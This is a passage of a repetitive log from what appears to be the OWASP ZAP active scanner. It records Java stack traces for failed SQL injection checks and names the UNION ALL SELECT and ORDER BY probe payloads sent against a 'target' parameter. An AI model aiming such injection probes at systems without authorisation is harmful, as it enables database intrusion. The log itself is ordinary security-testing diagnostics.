Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685655 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685656 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685658 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685659 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685660 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685661 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685662 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685663 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' ORDER BY 8988#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685665 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685666 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685667 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685668 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685670 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685671 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685673 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685674 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at 